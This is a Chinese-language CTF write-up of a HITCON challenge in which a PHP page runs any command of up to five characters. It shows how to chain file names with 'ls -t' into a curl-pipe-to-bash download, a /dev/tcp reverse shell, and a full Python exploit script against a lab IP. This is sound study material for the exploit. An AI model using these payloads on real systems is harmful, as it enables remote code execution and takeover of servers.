hitcon的題好難啊！！！！！
還是太菜了。。Orz
只能夠賽后搭環境復現了。。
分享本題自制Dockerfile：Github

這題是一個特別的命令執行題， 首先進去首頁之后發現以下源碼

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

無論我們傳什么進去他都會照單執行，但是每次的長度限制為最多5個字符，正常來說最短(?)的寫shell方式應該是

echo x>>1
....
sh 1

但是其實我們可以利用ls來寫shell，如下：

>a
ls>_
sh _  #也就執行了a指令 但是沒有意義，所以我們就要構造一系列的指令出來追加到文件里

那么這里就涉及到幾個問題：

1. ls出來是按照什么順序排列的文件？
2. 追加文件的時候會自動加入換行 這個問題要怎么解決？
3. 如果ls途中有無用的文件怎么辦？ 因為如果是以上的做法的話其實cat _你會發現里面還有一個_文件

答案：

1. ls -l的默認排序方式手冊上寫了是alphabetically（字典序）也就是說有可能后面加入的文件名排在前面，為了避免這個問題我們可以加入-t參數來使ls之后的結果按照最近修改的文件在前面的方式排列

2. linux的命令執行中支持命令換行 需要用到反斜杠\ 寫到最后面，如：
   ??

3. 其實bash在執行腳本的時候遇到未知的命令會報錯 但是這并不會使之退出，bash會繼續執行下一行的命令，如圖
   ??

那到這里思路其實已經挺清晰的了, 就是通過寫入一系列指令的分段，并用反斜杠\作為文件結尾，最后執行ls -t>g并且sh g來執行我們想要的指令，這里以執行反彈shell為例：

curl 10.188.2.20|bash

我的10.188.2.20/index.html文件內容為:

bash -i >& /dev/tcp/10.188.2.20/12345 0>&1

• 寫入 ls -t>g指令到_文件

?cmd=>ls\\    #創建ls\
?cmd=ls>_    #創建 _ 文件 文件內容為_ \n ls\ \n
?cmd=>\ \\    #創建 \空格 文件
?cmd=>-t\\    #創建 -t\ 文件
?cmd=>\>g    #創建 >g 文件
?cmd=ls>>_   #將剛剛創建的文件名按照字典序寫入_文件 這里的字典序是特殊符號在ls\的前面 所以在生成ls\之后我們要先ls>_ 保證ls\在最前面

最后生成的_文件結果如圖：

_ 文件

最后我們需要生成我們自己的命令的時候直接sh _就可以在g文件里面生成我們想要的命令了 然后再sh g就可以rce了

比如我要執行 curl 10.188.2.20|bash (index.html已經提前放好反彈shell的命令)

因為這是按照時間倒敘ls 所以我要倒著生成我要執行的指令文件，比如orange大大的exp：

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 

    # generate `curl orange.tw.tw|python`
    # generate `curl 10.188.2.20|bash` 
    '>sh\ ', 
    '>ba\\', 
    '>\|\\',
    '>20\\',
    '>2.\\', 
    '>8.\\',
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # exec
    'sh _', 
    'sh g', 
]



r = requests.get('http://10.188.2.20:22460/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.get('http://10.188.2.20:22460/?cmd=' + quote(i) )
    print i
    sleep(0.2)

在生成自己的命令時要注意各個命令段之間名字不能相同 因為不能生成兩個帶有相同命令段的文件名

//偷懶偷了好久才復現的。。Orz。。。。批評一下自己的懶惰。。
各位大佬有啥更好的思路歡迎分享

參考:
https://github.com/orangetw/My-CTF-Web-Challenges